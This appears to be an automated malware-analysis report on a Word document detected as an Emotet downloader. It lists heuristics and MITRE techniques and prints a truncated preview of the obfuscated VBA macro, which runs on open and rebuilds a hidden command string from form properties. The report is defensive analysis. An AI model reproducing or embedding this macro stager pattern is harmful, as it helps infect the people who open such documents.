MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro that runs automatically when the document is opened: the extracted source defines Document_open in the ThisDocument module (Bitxhrjgp), and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic finds the same auto-exec token next to execution tokens in the compiled p-code stream, so the behaviour is established even where source extraction fails. The visible code matches the hidden-command-stager shape: the helper function Ialmizozauxqh (module Iyejcapn) reads an MSForms TextBox declared through VB_Control (Bitxhrjgp.Nvfplifobfo) and concatenates it with properties of the UserForm module Noxbrghspp to rebuild a string, while the surrounding For loops and Tan/CDbl arithmetic on variables that are never assigned are filler with no effect. The CreateObject and GetObject calls that consume such a string are flagged by the heuristics but lie beyond the truncated preview. As the stager heuristic itself notes, this is a macro downloader/loader pattern, not an exploit of an Office vulnerability. ClamAV's signature Doc.Downloader.Emotet-7458561-0 identifies it as a known Emotet downloader variant.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-7458561-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-7458561-0
- VBA macros detected (medium, 5 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical) [OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER]: A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that appears in the markup of ordinary Office documents; treat it as a schema identifier, not as a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8121 bytes | 0cd7ccc0fc161a39607d71ebbceefad3644e60dbcd6be62f45af1aeac86c6fd5 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Bitxhrjgp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nvfplifobfo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Ggvyuqilog
Dim Rjzpngdwx
For Adoevnutxqrg = Wsdafmwkc To 0
Keaoexfvf = xPI
Ywmnbtnrn = CDbl(3)
Gmmxunopzdbg = Tan(MyeW5A)
Dissmfxs = 4 - Rifvxdpjnqynb
Sgqvcwpj = (3 - Luzbqxnopfmht)
Ostmdpglpuygx = Cytwmiqi
Lzlbplnyznev = CDbl(6)
Jejjgrqpso = Tan(Nwfnyjwtspv)
Next
Dim Lllknmteqqpn
Dim Xmuesxtmslj
For Spwoynaiop = Wsdafmwkc To 0
Layfolbpsyk = xPI
Qnaysabzbb = CDbl(3)
Braghjxhngxu = Tan(MyeW5A)
Ahystftg = 4 - Ajvplrkyjlnta
Pnvvkqgrnz = (3 - Iijbvkag)
Hvwvzkvrhgq = Rxkwjtrh
Qbpzjsizbmbf = CDbl(6)
Oqvvwsmjaesdk = Tan(Mgfsdfujkmyy)
Next
Dim Grgtpuhf
Dim Obyhsxlwobgh
For Atfgcxmbgig = Wsdafmwkc To 0
Tgpuueyuywta = xPI
Evgxzdrswo = CDbl(3)
Hemuqbge = Tan(MyeW5A)
Ygmdpubxmfa = 4 - Gzkhicaka
Wtidfstwrnw = (3 - Vnwrzcuctw)
Guxbsgxmvgwm = Umdwukazlvg
Yzodwcizxw = CDbl(6)
Hymqpqjthhiyw = Tan(Uhjcvivyngdzk)
Next
Wnzvxsqak
End Sub
Attribute VB_Name = "Noxbrghspp"
Attribute VB_Base = "0{8D8AB0EE-BCBE-4569-9D91-ACBA2ABA6288}{11439809-AED8-417B-8B3C-336D335BD734}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Iyejcapn"
Function Ialmizozauxqh()
Dim Somucqcw
Dim Mzszclbggbzr
For Jufgbijjtmhva = Wsdafmwkc To 0
Vdatotvnuz = xPI
Rmrbaynkhkwuy = CDbl(3)
Ggsgkxwk = Tan(MyeW5A)
Ybfnglhsiswck = 4 - Nsbkgfugpphcs
Ubtccwhx = (3 - Pcpqgevljxevz)
Dvpxziougxvi = Afvalrdf
Llqjaxzccj = CDbl(6)
Rzbqaiis = Tan(Oiiriuozpyfg)
Next
Fwewzziysa = Bitxhrjgp.Nvfplifobfo
Dim Jttzzpbr
Dim Qffanlmbhzd
For Mofdeuigncrkm = Wsdafmwkc To 0
Dmbrnhfaq = xPI
Qvcjgzyuhkul = CDbl(3)
Ohccopabhxuxl = Tan(MyeW5A)
Goozmeneevr = 4 - Cujbftyzdxc
Onepjnadavf = (3 - Tbdygwejzm)
Sszrdrmmvpzz = Eknczepvax
Qfjhpbrvq = CDbl(6)
Mwetzodb = Tan(Tstvwmjdxs)
Next
Xuozuvkm = Fwewzziysa + Noxbrghspp.Jxzubcxrxu + Noxbrghspp.Gsyrwbuclsok + Noxbrghspp.Ydntosjwwp
Dim Qcwifcgsn
Dim Ulwwtvpu
For Jiabtjdnhweof = Wsdafmwkc To 0
Mrvazsxlq = xPI
Kvzzqebgh = CDbl(3)
Glscefzvffkrg = Tan(MyeW5A)
Tdhlxkylzhoi = 4 - Nzekqlji
Sluxcaetvwk = (3 - Vwlhatupxuvrg)
Psklgtsmp = Zdvmjppaio
Jpcyvryf = CDbl(6)
Xeclzsfcjwgr = Tan(Ukkgcfwskpb)
Next
Zwkyadvwkg = Xuozuvkm + Noxbrghspp.Txzwzvgnylw + Noxbrghspp.Ygdcwgum
Dim Ajtbzfgrttacu
Dim Agtiijgeyeub
For Xhvvtrduxsraj = Wsdafmwkc To 0
Njoqhqxs = xPI
Qteuwedpvvmeh = CDbl(3)
Pfiariac = Tan(MyeW5A)
Vgkjgzoqxd = 4 - Zbnnkoiqibnpr
Ropprcjbytf = (3 - Xojxerfhmdxmu)
Tsvrvlxb = Gvqzptezmst
Lafgfkrdwrg = CDbl(6)
Yoskambkx = Tan(Hxjsmisjbck)
Next
Ialmizozauxqh = Gnnsnrmty + Zwkyadvwkg + Gnnsnrmty
Dim Iunyjhyvwf
Dim Bbygtfrmsf
For Hcmpqervb = Wsdafmwkc To 0
Qcskogroaplcs = xPI
Mzizrdmgq = CDbl(3)
Ifsovhkfidav = Tan(MyeW5A)
Bqgqvatel = 4 - Nczsdvbdtxmw
Drndbmefspnf = (3 - Haetbwiflnfi)
Jjpuuxsigake = Jjfxfgvss
Pkxfzysnlvjz = CDbl(6)
Tcyuejwiaw = Tan(Hdrwrqxze)
Next
End Func
... (truncated)